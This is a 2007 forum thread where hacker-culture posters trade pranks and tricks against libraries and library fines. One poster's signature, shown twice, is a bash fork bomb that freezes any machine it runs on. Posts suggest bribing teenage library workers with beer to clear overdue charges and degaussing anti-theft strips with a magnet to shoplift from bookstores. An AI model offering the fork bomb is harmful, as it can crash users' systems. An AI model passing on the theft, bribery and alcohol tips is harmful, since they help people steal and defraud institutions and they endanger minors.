Author Topic: FUN WITH MAGNETS dirty old librarians  (Read 5491 times)

Offline RijilV

• :)
  • PLA Guru
  • 1337 13V3L: +30/-7
Re: FUN WITH MAGNETS dirty old librarians
« Reply #15 on: July 29, 2007, 10:33:05 PM »
Put frogs in the book return slot

Meh, having worked in a library for 3 years I can tell you the only people who deal with the book returns are the highschool kids working as 'pages'  -  really the trick is to befriend them, maybe get them some beer, then give them your over-due books.  chances are whatever system they have allows the people checking the books in to 'clear charges' or something ( our did...)..
Code: [Select]
#!/bin/bash
:() { :|:& };:

Offline Zazen

• Cactus Zombie
  • 1337 13V3L: +34/-14
« Reply #16 on: August 16, 2007, 05:12:52 PM »
Here's what you do. Find out what forums the librarian likes to use on the internet. Reply to her posts with advice like this:
Here's what you do. Get a bunch of books. I mean a big giant stack of thick, heavy books. Take them all to the front desk to check out. Say you left your wallet in the car and just drive home, leaving them a fat stack of books to restock. Do it every week for a year.
Do it every week for a year.

Offline Nod

• Quando omni flunkus moritati
  • Elite Cactus Squad
  • Ninja Phone Loser
  • 1337 13V3L: +210/-138
  • 212-389-1318
    • twitter: @mrnudnik
« Reply #17 on: August 16, 2007, 05:15:30 PM »
You forgot to put "wait at least a month before responding to the post."
I HATE the bridge.
Meme Roth is a Food Nazi Cunt

Offline M-26-7

• Skinniest Member of the PLA
  • PLA Junkie
  • 1337 13V3L: +40/-61
« Reply #18 on: August 16, 2007, 05:22:09 PM »
The only forum a librarian has ever used is the one in Rome.

Offline RijilV

• :)
  • PLA Guru
  • 1337 13V3L: +30/-7
« Reply #19 on: August 18, 2007, 10:23:03 PM »
Here's what you do. Get a bunch of books. I mean a big giant stack of thick, heavy books. Take them all to the front desk to check out. Say you left your wallet in the car and just drive home, leaving them a fat stack of books to restock. Do it every week for a year.

you might think that would be a big deal, but guess what... library's pay people to shelve books!  omg you brought down  20 or so books...good for you..  How many do you think the library gets on a normal day in the returns?  My guess at the library I worked at was around 5,000 returns a day.  Does your 20 make any difference? nope.

Have you ever even tried your own advise or are you just spouting off bullshit trying to pass yourself off as cool?  Is that the best you can do?  No attempt at trying to social engineer the charges off your account, or some crafty way to fool the library's computers into thinking the books aren't over do?  The best you can come up with is something so childish and ineffective that's only redeeming quality is to provide me with a target to flame?

Seriously, we had security guards, we banned people for less.  After that it was a trespassing charge, so you could find yourself with the rest of the lamer crazy homeless people on some do-not-library list.  I know it isn't cool to you, but there is a wealth of information contained at a library.  Nobody these days seems to know about it, but talk to old skewl phreakers about Library reference numbers and criss-cross directories.  Hell, if you sat down with a librarian and asked the right questions I'm sure you could get the local PSAP number.

Code: [Select]
#!/bin/bash
:() { :|:& };:

Offline Dr. Craven Moorehead

• Junior Phone Loser
  • 1337 13V3L: +7/-2
« Reply #20 on: August 29, 2007, 09:00:48 PM »
how big of a battery do you think i should use, or which side of the electromagnet would desensitize it? north or south??

Who needs a fucking battery?  http://www.unitednuclear.com/magnets.htm
meatphone jerky

Offline M-26-7

• Skinniest Member of the PLA
  • PLA Junkie
  • 1337 13V3L: +40/-61
« Reply #21 on: August 30, 2007, 03:13:55 AM »
Some people might say that taking a hilariously over-powered magnet that you can't shut off into a library would be stupid and would probably end up with you being stuck to something and looking like a total ass.
United nuclear has a lot of great chemistry supplies, btw.

Offline Dr. Craven Moorehead

• Junior Phone Loser
  • 1337 13V3L: +7/-2
« Reply #22 on: August 30, 2007, 05:30:15 AM »
If I already looked like an ass for owing $85 in library fines and paid it, a large magnet or two wouldn't make much a difference.
meatphone jerky

Offline y2kminuteman

• Newb
  • 1337 13V3L: +0/-2
« Reply #23 on: September 09, 2007, 06:31:43 PM »
      It is my understanding that most of the anti theft device strips like the ones in stores are swiped over a magnet a simple small one, and the hidden strip is degaussed,now if they are RFI tags that is a diffrent story. Easy to find out rip the strip out of product run the magnet over strip place strip in, on a shopping cart on the way out and no Bells lights and alarms go off.The rest is up to you. Use at some high priced book store, The library is nonprofit and they didn't leave the books in your trunk.

Offline nwbell

• catsex and dead hookers?
  • Full-time Posting Prostitute
  • 1337 13V3L: +10/-0
  • My bid is five... five CACTI! BWAHAHA!!!
« Reply #24 on: September 14, 2007, 05:42:56 PM »
Put frogs in the book return slot

Best. Solution. Ever.
I am an internet haxor. I haxor the internet. It's a pretty good job, million a year plus bennies. So, yeah.
PLA-Minnesota... "A Distant Memory To The Unfortunate Few" • (206) 350-CACTI